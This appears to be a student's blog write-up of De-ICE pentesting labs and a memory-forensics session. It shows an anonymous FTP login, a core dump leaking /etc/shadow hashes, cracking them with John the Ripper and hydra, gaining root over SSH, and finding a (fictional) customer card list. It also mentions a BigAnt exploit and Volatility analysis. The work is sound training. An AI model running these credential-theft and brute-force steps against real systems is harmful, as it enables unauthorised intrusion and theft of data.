Lab 3 : Pentesting On Lab DIsk #1.10 v1.0

1. Information Gathering

First step is gathering information from target. In here I will scanning  first to gathering information from target,  and now I using nmap

We was find IP address the target namely 192.168.1.110 and there are more services that run like ftp on port 21, ssh on port 22, http on port 80, and ipp 631.

2. Service Enumeration

On section information gathering already shown services that running , but I want got description about services and port, so I run nmap again using <options> :

Like on screenshot above, nmap mendiskripsikan that : 

port 21   ftp ==> allowed to login using Anonymous 

port 22   ssh ==> ssh login

port 80   http ==> version of apache httpd 2.2.4

port 631 ipp  ==> provides a standard network protocol for remote printing

3. Vulnerabillity Assesment 

Capital of gathering information and service enumeration above, I found the vulnerabillity on system of target namely ftp, ssh, http.

- HTTP

Open IP address the target on browser and see what that inside

See on section that marked by me, description of system admin and crew and also shown the email.

Now I will login on ftp using User anonymous and password anonymous

root@bt:~# ftp 192.168.1.110

Connected to 192.168.1.110.

220 (vsFTPd 2.0.4)

Name (192.168.1.110:root): anonymous

331 Please specify the password.

Password:

230 Login successful.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ls

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

drwxr-xr-x    7 1000     513           160 Mar 15  2007 download

drwxrwxrwx    2 0        0              60 Feb 26  2007 incoming

226 Directory send OK.

ftp> cd download

250 Directory successfully changed.

ftp> ls -a

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

drwxr-xr-x    7 1000     513           160 Mar 15  2007 .

drwxr-xr-x    4 0        0              80 Mar 15  2007 ..

drwxr-xr-x    6 1000     513           340 Mar 15  2007 etc

drwxr-xr-x    4 1000     513           100 Mar 15  2007 opt

drwxr-xr-x   10 1000     513           400 Mar 15  2007 root

drwxr-xr-x    5 1000     513           120 Mar 15  2007 usr

drwxr-xr-x    3 1000     513            80 Mar 15  2007 var

226 Directory send OK.

ftp> cd etc

250 Directory successfully changed.

ftp> ls -la

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

drwxr-xr-x    6 1000     513           340 Mar 15  2007 .

drwxr-xr-x    7 1000     513           160 Mar 15  2007 ..

drwxr-xr-x    4 1000     513           160 Mar 15  2007 X11

-rw-r--r--    1 1000     513        362436 Mar 03  2007 core

drwxr-xr-x    2 1000     513           100 Mar 15  2007 fonts

-rw-r--r--    1 1000     513           780 Apr 30  2005 hosts

-rw-r--r--    1 1000     513           718 Jul 03  2005 inputrc

-rw-r--r--    1 1000     513          1296 Jun 10  2006 issue                                

-rw-r--r--    1 1000     513           183 Jun 23  2005 lisarc                               

-rw-r--r--    1 1000     513            56 Oct 21  2004 localtime                            

lrwxrwxrwx    1 1000     513            23 Nov 09 14:18 localtime-copied-from -> /usr/share/zoneinfo/GMT

-rw-r--r--    1 1000     513         10289 Dec 31  2003 login.defs

-rw-r--r--    1 1000     513             1 Dec 31  2003 motd-slax

drwxr-xr-x    2 1000     513           100 Mar 15  2007 profile.d

drwxr-xr-x    2 1000     513           220 Mar 15  2007 rc.d

-rw-r--r--    1 1000     513           440 Jul 18  2006 shadow

226 Directory send OK.

ftp> get core

local: core remote: core

200 PORT command successful. Consider using PASV.

150 Opening BINARY mode data connection for core (362436 bytes).

226 File send OK.

362436 bytes received in 0.02 secs (18602.1 kB/s)

ftp> exit

421 Timeout.

Above is process to see the content in ftp folder. And I found file core (see on yellow block), core file is file that saving core dump data (memory, storage, dan debugging dump). Then I put the file core using command get (like above) and this will be automated saved on our root directory.

Cek on our directory

And cek the content of core file

root@bt:~# strings core

tdxt

CORE

CORE

test.pl

/usr/bin/perl ./test.pl -d                                                                   

CORE                                                                                         

CORE

FLINUX                                                                                       

 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~

ocks                                                                                         

CPLUS_INCLUDE_PATH=/usr/lib/qt/include:/usr/lib/qt/include                                   

MANPATH=/usr/local/man:/usr/man:/usr/X11R6/man:/opt/kde/man:/usr/lib/qt/doc/man

KDE_MULTIHEAD=false                                                                          

HZ=100                                                                                       

HOSTNAME=slax.slackware-live.cd                                                              

SHELL=/bin/bash

TERM=xterm                                                                                   

GTK2_RC_FILES=/etc/gtk-2.0/gtkrc:/root/.gtkrc-2.0:/root/.kde/share/config/gtkrc-2.0          

GTK_RC_FILES=/etc/gtk/gtkrc:/root/.gtkrc:/root/.kde/share/config/gtkrc

GS_LIB=/root/.fonts                                                                          

WINDOWID=25165831

HUSHLOGIN=FALSE                                                                              

QTDIR=/usr/lib/qt

LC_ALL=C                                                                                     

KDE_FULL_SESSION=true

USER=root

<continue>

. . . . . . . . . .  . . .

. . . . . . .  . . . . . .

.gnu.version_d

.text

.note

.eh_frame_hdr

.eh_frame

.dynamic

.useless

root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::

In the end of content, it is the user's password hash string of De-ICE. We not possible to login using the password hash like above because still encrypted. 

3. Exploit

After we got the hash password, we have to do to decrypt the password hash by crack it. in here I using JTR (John The Ripper). For description for JTR please visit here.

The hash password :

root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::

We need to filtered, because we only need user and password to login into ssh later. Like this :

root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::

aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::

bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::

ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::

Oke, We was got four users and encrypted password.

The next is cracking using John The Ripper. before we doing to crack, we must have a wordlist as dictionary by JTR.

Now open John The Ripper on your Backtrack /pentest/passwords/john

To see how to usahe you can type john

Now start to crack, this process maybe  need long time depending your computer specification :D

On above we was succes crack the password and foun three users and password like :

Complexity       (root)

Diatomaceous     (ccoffee)

Zymurgy          (bbanter)

Afterthat, trying to login into ssh. I not screenshot for this, because too long, so I copy from konsole.

I login using user bbanter

root@bt:~# ssh bbanter@192.168.1.110

bbanter@192.168.1.110's password: ********

Linux 2.6.16.

bbanter@slax:~$

Then login into root (Higest Privilege)

bbanter@slax:~$ su

Password: **********

root@slax:/home/bbanter# 

OMG !! Now I on the root system :D

What are you doing after you succes login into root ? It's up to you :D

In below is that I doing namely look around what the content of system

root@slax:/home/bbanter# ls

root@slax:/home/bbanter# cd /home/

root@slax:/home# 

root@slax:/home# ls

aadams  bbanter  ccoffee  ftp  root

root@slax:/home# cd root/ 

root@slax:/home/root# ls -lh

total 0

root@slax:/home/root# ls

root@slax:/home/root# ls -a

.  ..  .save  .screenrc

root@slax:/home/root# cd .screenrc 

bash: cd: .screenrc: Not a directory

root@slax:/home/root# cat .screenrc 

#

# Example of a user's .screenrc file

#

# This is how one can set a reattach password:

# password ODSJQf.4IJN7E    # "1234"

# no annoying audible bell, please

vbell on

# detach on hangup

autodetach on

# don't display the copyright page

startup_message off

# emulate .logout message

pow_detach_msg "Screen session of \$LOGNAME \$:cr:\$:nl:ended."

# advertise hardstatus support to $TERMCAP

# termcapinfo  * '' 'hs:ts=\E_:fs=\E\\:ds=\E_\E\\'

# make the shell in every window a login shell

#shell -$SHELL

# autoaka testing

# shellaka '> |tcsh'

# shellaka '$ |sh'

# set every new windows hardstatus line to somenthing descriptive

# defhstatus "screen: ^En (^Et)"

defscrollback 1000

# don't kill window after the process died

# zombie "^["

# enable support for the "alternate screen" capability in all windows

# altscreen on

################

#

# xterm tweaks

#

#xterm understands both im/ic and doesn't have a status line.

#Note: Do not specify im and ic in the real termcap/info file as

#some programs (e.g. vi) will not work anymore.

termcap  xterm hs@:cs=\E[%i%d;%dr:im=\E[4h:ei=\E[4l

terminfo xterm hs@:cs=\E[%i%p1%d;%p2%dr:im=\E[4h:ei=\E[4l

#80/132 column switching must be enabled for ^AW to work

#change init sequence to not switch width

termcapinfo  xterm Z0=\E[?3h:Z1=\E[?3l:is=\E[r\E[m\E[2J\E[H\E[?7h\E[?1;4;6l

# Make the output buffer large for (fast) xterms.

#termcapinfo xterm* OL=10000

termcapinfo xterm* OL=100

# tell screen that xterm can switch to dark background and has function

# keys.

termcapinfo xterm 'VR=\E[?5h:VN=\E[?5l'

termcapinfo xterm 'k1=\E[11~:k2=\E[12~:k3=\E[13~:k4=\E[14~'

termcapinfo xterm 'kh=\EOH:kI=\E[2~:kD=\E[3~:kH=\EOF:kP=\E[5~:kN=\E[6~'

# special xterm hardstatus: use the window title.

termcapinfo xterm 'hs:ts=\E]2;:fs=\007:ds=\E]2;screen\007'

#terminfo xterm 'vb=\E[?5h$<200/>\E[?5l'

termcapinfo xterm 'vi=\E[?25l:ve=\E[34h\E[?25h:vs=\E[34l'

# emulate part of the 'K' charset

termcapinfo   xterm 'XC=K%,%\E(B,[\304,\\\\\326,]\334,{\344,|\366,}\374,~\337'

# xterm-52 tweaks:

# - uses background color for delete operations

termcapinfo xterm* be

################

#

# wyse terminals

#

#wyse-75-42 must have flow control (xo = "terminal uses xon/xoff")

#essential to have it here, as this is a slow terminal.

termcapinfo wy75-42 xo:hs@

# New termcap sequences for cursor application mode.

termcapinfo wy* CS=\E[?1h:CE=\E[?1l:vi=\E[?25l:ve=\E[?25h:VR=\E[?5h:VN=\E[?5l:cb=\E[1K:CD=\E[1J

################

#

# other terminals

#

# make hp700 termcap/info better

termcapinfo  hp700 'Z0=\E[?3h:Z1=\E[?3l:hs:ts=\E[62"p\E[0$~\E[2$~\E[1$}:fs=\E[0}\E[61"p:ds=\E[62"p\E[1$~\E[61"p:ic@'

# Extend the vt100 desciption by some sequences.

termcap  vt100* ms:AL=\E[%dL:DL=\E[%dM:UP=\E[%dA:DO=\E[%dB:LE=\E[%dD:RI=\E[%dC

terminfo vt100* ms:AL=\E[%p1%dL:DL=\E[%p1%dM:UP=\E[%p1%dA:DO=\E[%p1%dB:LE=\E[%p1%dD:RI=\E[%p1%dC

termcapinfo linux C8

# old rxvt versions also need this

# termcapinfo rxvt C8

################

#

# keybindings

#

#remove some stupid / dangerous key bindings

bind k

bind ^k

bind .

bind ^\

bind \\

bind ^h

bind h

#make them better

bind 'K' kill

bind 'I' login on

bind 'O' login off

bind '}' history

# Yet another hack:

# Prepend/append register [/] to the paste if ^a^] is pressed.

# This lets me have autoindent mode in vi.

register [ "\033:se noai\015a"

register ] "\033:se ai\015a"

bind ^] paste [.]

################

#

# default windows

#

# screen -t local 0

# screen -t mail 1 mutt

# screen -t 40 2 rlogin server

# caption always "%3n %t%? @%u%?%? [%h]%?%=%c"

# hardstatus alwaysignore

# hardstatus alwayslastline "%Lw"

# bind = resize =

# bind + resize +1

# bind - resize -1

# bind _ resize max

#

# defnonblock 1

# blankerprg rain -d 100

# idle 30 blanker

root@slax:/home/root# ls -a

.  ..  .save  .screenrc

root@slax:/home/root# cat .save/

cat: .save/: Is a directory

root@slax:/home/root# cd .save/

root@slax:/home/root/.save# ls

copy.sh  customer_account.csv  customer_account.csv.enc

root@slax:/home/root/.save# cat cus

customer_account.csv      customer_account.csv.enc  

root@slax:/home/root/.save# cat customer_account.csv

"CustomerID","CustomerName","CCType","AccountNo","ExpDate","DelMethod"

1002,"Mozart Exercise Balls Corp.","VISA","2412225132153211","11/09","SHIP"

1003,"Brahms 4-Hands Pianos","MC","3513151542522415","07/08","SHIP"

1004,"Strauss Blue River Drinks","MC","2514351522413214","02/08","PICKUP"

1005,"Beethoven Hearing-Aid Corp.","VISA","5126391235199246","09/09","SHIP"

1006,"Mendelssohn Wedding Dresses","MC","6147032541326464","01/10","PICKUP"

1007,"Tchaikovsky Nut Importer and Supplies","VISA","4123214145321524","05/08","SHIP"

root@slax:/home/root/.save# 

Hehe.. I find the bank account like above :D

Finish ^^

Lab 2 : Pentesting On Lab DIsk #1.100 v1.0

1. Information Gathering and Service Enumeration
First step to pentesting is gathering information from target. In here I gathering information with scanning using nmap.

On above was shown two ip address namely 192.168.1.12 (our ip address) and 192.168.1.100 (target ip address). also shown services that run on system target.

If you confused about service that run you can see the description with scanning  again using other options like below :

We can see on above, there are description of service that run and open/close port like :

20/tcp   closed ftp-data  => This port closed
21/tcp   open   ftp          => ftp server is open
22/tcp   open   ssh         => showing version op ssh version (OpenSSH 4.3)
25/tcp   open   smtp       => smtp used by client email to sending email out using port 25
80/tcp   open   http        => showing version of apache ( Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open   pop3      => pop3 is protocol e-mail same with smtp
143/tcp open   imap      =>  is standard protocol to access/put the e-mail from server
443/tcp closed https       =>  this port was closed

3. Vulnerabillity Assesment
Capital from Information and Service Enumeration, we was find vulnerabillty like on above. In here I can use http and ssh.
To access the http, we just open ip address target to browser and see the content

See on above, on bottom of page there are more list of name and email.

4. Exploit
From the list username and email we can bruteforcing the ssh services. But we must crack first to find the password from username. Then put the username on text editor like below.

In here I'm using hydra, before starting crack we must have a wordlist. You can obtain the wordlist from pentest directory or you can search on the web. In here I using wordlist from pentest directory.


root@bt:~# cd /pentest/passwords/wordlists/
root@bt:/pentest/passwords/wordlists# ls
darkc0de.lst  rockyou.txt

I use darkc0de.lst then I filtered content of wordlist, because the content very  large and very much, while the username that we will crack just a few. is intended that the crack is not too heavy, considering my system less qualified for it.

Lets crack using hydra.

Ok, now we was got the username and password to login

Let's login using username : bbanter and password : bbanter like the result above.

 root@bt:~# ssh bbanter@192.168.1.100
bbanter@192.168.56.101's password:
Linux 2.6.16.

On above we was succes login into ssh, but not root. then check on /etc/passwd to look for other users

bbanter@slax:~$ cat /etc/passwd 

root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash

bin:x:1:1:bin:/bin:

daemon:x:2:2:daemon:/sbin:

adm:x:3:4:adm:/var/log:

lp:x:4:7:lp:/var/spool/lpd:

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/:

news:x:9:13:news:/usr/lib/news:

uucp:x:10:14:uucp:/var/spool/uucppublic:

operator:x:11:0:operator:/root:/bin/bash

games:x:12:100:games:/usr/games:

ftp:x:14:50::/home/ftp:

smmsp:x:25:25:smmsp:/var/spool/clientmqueue:

mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash

rpc:x:32:32:RPC portmap user:/:/bin/false

sshd:x:33:33:sshd:/:

gdm:x:42:42:GDM:/var/state/gdm:/bin/bash

pop:x:90:90:POP:/:

nobody:x:99:99:nobody:/:

aadams:x:1000:10:,,,:/home/aadams:/bin/bash

bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash

ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash

Then check on /etc/shadow

bbanter@slax:~$ cat /etc/shadow 

cat: /etc/shadow: Permission denied

bbanter@slax:~$ 

Hufft.. we have a problem on the permissions, it turns out bbanter does not have access to a higher. but on bottom of the result we find three username like (aadams, bbanter, ccoffee).

Delete more username in userlist.txt except username that listed on etc/passwd.

The next, crack again list of user that find from /etc/passwd. In here I using hydra-gtk (GUI) because more than simple :D

Yes, We find the password of user aadams

Login into ssh using user aadams, then check on /etc/passwd

Then check /etc/shadow with using sudo command like below :

Ok, now we was find the hashes of password.

Then cracking the hashes password using John The Ripper like below.

Haha.. We find the password of root, way to gain highest privilege more than easy.

Let's login...

Finish, now we at root and highest privelege was gained :D

Alhamdulillah ^^

Memory Forensic Analyze

In this moment, I will write about what I learned this afternoon on camp. Namely about Memory Forensic.

Lets.. Start !

The first, I will scanning the target using nmap like below :

From here, I will direct exploit the system. In here I will exploit the application that running on windows system namely Bigant Server on port 6660. You can look the exploit on exploit-db

Now running the exploit and connection to system using telnet like following screenshot :

Then see the service are running using command tasklist -svc (on windows system)

in above is the process list are running

The next is capture the memory process
Open application Accesdata FTK there are on windows

Then start capture the memory

Save the memdump.mem on /var/www/ptk

1. Analyze using PTK
Afterthat open the PTK tools on Application => Forensics => RAM Forensic Tools => ptk
Then will show you like this

Enter the username and password that was configure, If you not yet configure the PTK, please configure first ! You can see the cofiguration in here.

Then create new case with enter the name of case what you want.

Afterthat, just follow what is required..

Now is seeing pslist and then click start like following screenhot :

below is result pslist from memory.

NOTE : you can choose in drop down menu, there are more options that you can used.

B. Using Volatility command
Go to directory of tools first on /pentest/forensics/volatility/
There are many options that you can used with type command
# ./vol.py -h

Now cek the sockets using command like following screenshot :

Or check the connections

Please read on help if you need to use more options to analyze. Thanks..